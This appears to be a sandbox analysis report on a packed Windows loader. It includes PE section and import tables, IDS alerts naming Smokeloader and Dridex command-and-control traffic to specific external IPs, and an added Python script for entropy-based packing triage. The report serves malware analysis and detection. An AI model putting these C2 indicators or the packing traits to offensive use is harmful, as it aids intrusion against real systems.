IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x1b458 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1a000 | 0x184 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1825f | 0x18400 | ccffbd60daae297a16e5605ecdf8b1b9 | False | 0.791881443298969 | data | 7.491043543257427 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x1a000 | 0x2022 | 0x2200 | bd2aeb775d2212e7e850380796bfcf7c | False | 0.35558363970588236 | data | 5.419783316224275 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1d000 | 0xf7ff8 | 0x1800 | 194bf695db6178974b2a814107547425 | False | 0.2591145833333333 | data | 2.6738567633681227 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x115000 | 0x51d | 0x600 | 53e979547d8c2ea86560ac45de08ae25 | False | 0.013020833333333334 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x116000 | 0x1a1e0 | 0x1a200 | 08eda3433f9130009b997d2b9c82f726 | False | 0.44921875 | data | 5.223261219518492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
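The section table above is the first thing to read on a loader like this: .text is executable with an entropy of 7.49 (plain compiler output usually sits well below 7), and .data declares a virtual size of 0xf7ff8 against only 0x1800 bytes of raw data, a zero-filled region more than a hundred times the on-disk size that is typically written at runtime by the unpacking routine. The script below is an added example, not Joe Sandbox code: it recomputes these columns from any PE file and flags those two patterns plus W+X sections. Run without an argument it builds a small synthetic PE32 in memory, which is constructed test data, not the analysed sample.

```python
"""PE section triage: recompute the per-section figures a sandbox section table
shows (virtual/raw size, MD5, entropy, characteristics) and flag combinations
that point at a packed loader. Added example, not Joe Sandbox code. Pass a PE
path as argv[1]; with no argument it runs on a small synthetic PE32 built in
memory (constructed test data, not the analysed sample)."""
import hashlib
import math
import random
import struct
import sys

# IMAGE_SCN_* characteristic bits (winnt.h).
SCN_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}
SCN_MEM_EXECUTE, SCN_MEM_WRITE = 0x20000000, 0x80000000

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def parse_sections(pe: bytes) -> list:
    """DOS header -> PE signature -> COFF header -> section headers -> raw bytes."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    off = coff + 20 + opt_size          # first IMAGE_SECTION_HEADER
    sections = []
    for _ in range(nsections):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, off)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        raw = pe[rawptr:rawptr + rawsize]
        sections.append({
            "name": name.rstrip(b"\0").decode("latin-1"),
            "va": va, "vsize": vsize, "rawsize": rawsize,
            "md5": hashlib.md5(raw).hexdigest(),
            "entropy": shannon_entropy(raw),
            "characteristics": chars,
            "flags": [n for bit, n in SCN_FLAGS.items() if chars & bit],
        })
        off += 40
    return sections

def triage(sections: list) -> dict:
    """Section name -> list of findings; an empty list means nothing notable."""
    findings = {}
    for s in sections:
        notes = []
        executable = bool(s["characteristics"] & SCN_MEM_EXECUTE)
        if executable and s["entropy"] > 7.0:
            notes.append("high-entropy executable section: packed or encrypted code")
        if s["rawsize"] and s["vsize"] > 8 * s["rawsize"]:
            notes.append("virtual size far exceeds raw size: zero-filled region to unpack into")
        if executable and s["characteristics"] & SCN_MEM_WRITE:
            notes.append("writable and executable (W+X)")
        findings[s["name"]] = notes
    return findings

def build_synthetic_pe() -> bytes:
    """Constructed two-section PE32: .text filled with pseudo-random bytes (stands
    in for packed code) and .data with 0x200 raw bytes but 0x80000 virtual bytes."""
    rnd = random.Random(2024)
    text_raw = bytes(rnd.getrandbits(8) for _ in range(0x400))
    data_raw = b"\0" * 0x200
    opt_size = 0xE0                                     # PE32 optional header
    hdr_len = 0x40 + 4 + 20 + opt_size + 2 * 40
    text_ptr = (hdr_len + 0x1FF) & ~0x1FF               # 512-byte file alignment
    data_ptr = text_ptr + len(text_raw)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0x6598C400, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)

    def sec(name, vsize, va, rawsize, rawptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, va, rawsize, rawptr, 0, 0, 0, 0, chars)

    hdrs = sec(b".text", len(text_raw), 0x1000, len(text_raw), text_ptr, 0x60000020)
    hdrs += sec(b".data", 0x80000, 0x2000, len(data_raw), data_ptr, 0xC0000040)
    image = bytearray(dos + b"PE\0\0" + coff + opt + hdrs)
    image += b"\0" * (text_ptr - len(image)) + text_raw + data_raw
    return bytes(image)

def main(argv: list) -> None:
    pe = open(argv[1], "rb").read() if len(argv) > 1 else build_synthetic_pe()
    sections = parse_sections(pe)
    findings = triage(sections)
    for s in sections:
        print(f"{s['name']:<8} va={s['va']:#x} vsize={s['vsize']:#x} raw={s['rawsize']:#x} "
              f"md5={s['md5']} entropy={s['entropy']:.3f} {', '.join(s['flags'])}")
        for note in findings[s["name"]]:
            print(f"{'':8} -> {note}")

if __name__ == "__main__":
    main(sys.argv)
```

The 8x ratio and the 7.0 entropy cut-off are triage thresholds chosen for this example, not values from the report; on the real sample the .data ratio is far above 8 and only .text crosses 7.0, so both flags fire on exactly the sections the table makes suspicious.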
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
AFX_DIALOG_LAYOUT | 0x128d08 | 0x2 | data | | | 5.0
ROCOCUPACOZODACAJAJ | 0x127d10 | 0xbf7 | ASCII text, with very long lines (3063), with no line terminators | Turkish | Turkey | 0.6010447273914463
SUZIZOXALIDEVODUGIDUVOJAPIPUCOFA | 0x128908 | 0x3fa | ASCII text, with very long lines (1018), with no line terminators | Turkish | Turkey | 0.6267190569744597
RT_CURSOR | 0x128d10 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.7368421052631579
RT_CURSOR | 0x128e40 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.06130705394190871
RT_ICON | 0x116a20 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.5748933901918977
RT_ICON | 0x1178c8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.6484657039711191
RT_ICON | 0x118170 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.6981566820276498
RT_ICON | 0x118838 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.7536127167630058
RT_ICON | 0x118da0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkish | Turkey | 0.5244813278008299
RT_ICON | 0x11b348 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkish | Turkey | 0.6282833020637899
RT_ICON | 0x11c3f0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkish | Turkey | 0.6409836065573771
RT_ICON | 0x11cd78 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkish | Turkey | 0.774822695035461
RT_ICON | 0x11d258 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Turkish | Turkey | 0.39712153518123666
RT_ICON | 0x11e100 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Turkish | Turkey | 0.5613718411552346
RT_ICON | 0x11e9a8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Turkish | Turkey | 0.6244239631336406
RT_ICON | 0x11f070 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Turkish | Turkey | 0.6372832369942196
RT_ICON | 0x11f5d8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Turkish | Turkey | 0.4448874296435272
RT_ICON | 0x120680 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Turkish | Turkey | 0.4364754098360656
RT_ICON | 0x121008 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Turkish | Turkey | 0.48404255319148937
RT_ICON | 0x1214d8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.39738805970149255
RT_ICON | 0x122380 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.49864620938628157
RT_ICON | 0x122c28 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.5213133640552995
RT_ICON | 0x1232f0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.5614161849710982
RT_ICON | 0x123858 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Turkish | Turkey | 0.350103734439834
RT_ICON | 0x125e00 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Turkish | Turkey | 0.37617260787992496
RT_ICON | 0x126ea8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Turkish | Turkey | 0.39918032786885244
RT_ICON | 0x127830 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Turkish | Turkey | 0.4122340425531915
RT_STRING | 0x12b5b8 | 0x424 | data | | | 0.44622641509433963
RT_STRING | 0x12b9e0 | 0x6c4 | data | | | 0.4255196304849885
RT_STRING | 0x12c0a8 | 0x620 | data | | | 0.4406887755102041
RT_STRING | 0x12c6c8 | 0x514 | data | | | 0.4576923076923077
RT_STRING | 0x12cbe0 | 0x660 | data | | | 0.4375
RT_STRING | 0x12d240 | 0x66e | data | | | 0.4307411907654921
RT_STRING | 0x12d8b0 | 0x7b2 | data | | | 0.42233502538071066
RT_STRING | 0x12e068 | 0x7e6 | data | | | 0.42037586547972305
RT_STRING | 0x12e850 | 0x5f4 | data | | | 0.4416010498687664
RT_STRING | 0x12ee48 | 0x6d0 | data | | | 0.4288990825688073
RT_STRING | 0x12f518 | 0x790 | data | | | 0.42613636363636365
RT_STRING | 0x12fca8 | 0x464 | data | | | 0.45462633451957296
RT_STRING | 0x130110 | 0xcc | data | | | 0.5490196078431373
RT_GROUP_CURSOR | 0x12b3e8 | 0x22 | data | | | 1.088235294117647
RT_GROUP_ICON | 0x127c98 | 0x76 | data | Turkish | Turkey | 0.6694915254237288
RT_GROUP_ICON | 0x11d1e0 | 0x76 | data | Turkish | Turkey | 0.6610169491525424
RT_GROUP_ICON | 0x121470 | 0x68 | data | Turkish | Turkey | 0.7115384615384616
RT_VERSION | 0x12b410 | 0x1a8 | data | | | 0.589622641509434
DLL | Import
KERNEL32.dll | SetPriorityClass, GetConsoleAliasesLengthW, CopyFileExW, GetNumaProcessorNode, ReadConsoleA, GetEnvironmentStringsW, WaitForSingleObject, InterlockedCompareExchange, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, SetCommState, GetCommandLineA, GlobalAlloc, GetVolumeInformationA, CopyFileW, GetConsoleAliasExesLengthW, GetSystemTimeAdjustment, WriteConsoleOutputA, GetFileAttributesA, HeapCreate, SetConsoleMode, GetBinaryTypeA, SearchPathW, GetLastError, GetProcAddress, GetLongPathNameA, MoveFileW, SearchPathA, LoadLibraryA, LocalAlloc, QueryDosDeviceW, FindAtomA, CreatePipe, GetModuleFileNameA, GetDefaultCommConfigA, GetModuleHandleA, BuildCommDCBA, PurgeComm, FatalAppExitA, WriteConsoleOutputAttribute, GetStdHandle, GetComputerNameA, HeapFree, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapAlloc, VirtualAlloc, HeapReAlloc, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize
USER32.dll | GetFocus
ADVAPI32.dll | ObjectPrivilegeAuditAlarmW
Language of compilation system | Country where language is spoken
Turkish | Turkey
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-08T18:23:27.750526+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 49836 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:28.876636+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 49842 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:29.764123+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 49843 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:31.473826+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 61260 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:32.363126+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 61270 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:33.235140+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 61279 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:36.225749+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 61297 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:37.095845+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 61302 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:38.050287+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 61308 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:38.944473+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 61315 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:40.657509+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 61321 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:41.860681+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 61327 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:42.740213+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 61334 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:43.610880+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 61340 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:44.513005+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 61347 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:45.415476+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 61355 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:46.357847+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 61360 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:47.252091+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 61365 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:48.814052+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 61370 | 160.177.223.165 | 80 | TCP
2024-10-08T18:23:49.702109+0200 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.6 | 61375 | 160.177.223.165 | 80 | TCP
                                                                                                                          2024-10-08T18:23:50.575715+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661382160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:51.441127+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661388160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:52.527195+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661397160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:53.404922+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661404160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:55.559019+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661419160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:56.454433+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661424160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:57.351748+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661425160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:58.386607+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661426160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:59.891018+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661427160.177.223.16580TCP
                                                                                                                          2024-10-08T18:24:00.795610+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661428160.177.223.16580TCP
                                                                                                                          2024-10-08T18:24:01.754405+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661429160.177.223.16580TCP
                                                                                                                          2024-10-08T18:24:02.629838+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661430160.177.223.16580TCP
                                                                                                                          2024-10-08T18:24:20.366638+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66143323.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:20.818347+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66143323.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:20.948318+02002829848ETPRO MALWARE SmokeLoader encrypted module (3)223.145.40.168443192.168.2.661433TCP
                                                                                                                          2024-10-08T18:24:21.816752+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66143423.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:22.092535+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66143423.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:22.716146+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66143523.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:23.001256+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66143523.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:23.603368+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66143623.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:23.881130+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66143623.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:24.559269+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66143723.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:24.867432+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66143723.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:25.495258+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66143823.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:26.230287+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66143823.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:27.083217+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66143923.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:27.381937+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66143923.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:28.004185+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144023.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:28.284963+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144023.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:28.889008+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144123.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:29.177525+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144123.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:29.775842+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144223.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:30.062705+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144223.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:30.682604+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144323.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:30.976278+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144323.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:31.837606+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144423.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:32.127269+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144423.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:32.735891+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144523.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:33.084547+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144523.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:33.708055+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144623.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:34.334207+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144623.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:35.121047+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144723.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:35.402522+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144723.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:36.013059+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144823.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:36.310731+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144823.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:36.915028+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144923.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:37.202175+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144923.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:38.479188+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66145023.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:38.785716+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66145023.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:39.402725+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66145123.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:39.673217+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66145123.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:40.283939+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66145223.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:40.573653+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66145223.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:46.922823+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66145423.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:47.342548+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66145423.145.40.168443TCP
                                                                                                                          2024-10-08T18:25:09.724772+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661455160.177.223.16580TCP
                                                                                                                          2024-10-08T18:25:11.261402+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661456160.177.223.16580TCP
                                                                                                                          2024-10-08T18:25:17.849622+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661457160.177.223.16580TCP
                                                                                                                          2024-10-08T18:25:25.694218+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661458160.177.223.16580TCP
                                                                                                                          2024-10-08T18:25:34.893758+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661459160.177.223.16580TCP
                                                                                                                          2024-10-08T18:25:46.638196+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661461160.177.223.16580TCP
                                                                                                                          2024-10-08T18:25:59.919254+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661462160.177.223.16580TCP
                                                                                                                          2024-10-08T18:26:00.552603+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66146323.145.40.168443TCP
                                                                                                                          2024-10-08T18:26:01.029765+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66146323.145.40.168443TCP
                                                                                                                          2024-10-08T18:26:17.303628+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66146523.145.40.168443TCP
                                                                                                                          2024-10-08T18:26:17.380497+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661464190.249.249.1480TCP
                                                                                                                          2024-10-08T18:26:17.815560+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66146523.145.40.168443TCP
                                                                                                                          2024-10-08T18:26:36.769052+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661466190.249.249.1480TCP
                                                                                                                          2024-10-08T18:26:37.622347+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66146723.145.40.168443TCP
                                                                                                                          2024-10-08T18:26:37.988810+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66146723.145.40.168443TCP
                                                                                                                          2024-10-08T18:26:55.070440+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661469190.249.249.1480TCP
                                                                                                                          2024-10-08T18:26:56.007175+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66147023.145.40.168443TCP
                                                                                                                          2024-10-08T18:26:56.524821+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66147023.145.40.168443TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 18:23:26.752580881 CEST | 49836 | 80 | 192.168.2.6 | 160.177.223.165
Oct 8, 2024 18:23:26.761591911 CEST | 80 | 49836 | 160.177.223.165 | 192.168.2.6
Oct 8, 2024 18:23:26.761660099 CEST | 49836 | 80 | 192.168.2.6 | 160.177.223.165
Oct 8, 2024 18:23:26.761815071 CEST | 49836 | 80 | 192.168.2.6 | 160.177.223.165
Oct 8, 2024 18:23:26.761830091 CEST | 49836 | 80 | 192.168.2.6 | 160.177.223.165
Oct 8, 2024 18:23:26.769870043 CEST | 80 | 49836 | 160.177.223.165 | 192.168.2.6
Oct 8, 2024 18:23:26.769880056 CEST | 80 | 49836 | 160.177.223.165 | 192.168.2.6
Oct 8, 2024 18:23:27.749219894 CEST | 80 | 49836 | 160.177.223.165 | 192.168.2.6
Oct 8, 2024 18:23:27.750324011 CEST | 80 | 49836 | 160.177.223.165 | 192.168.2.6
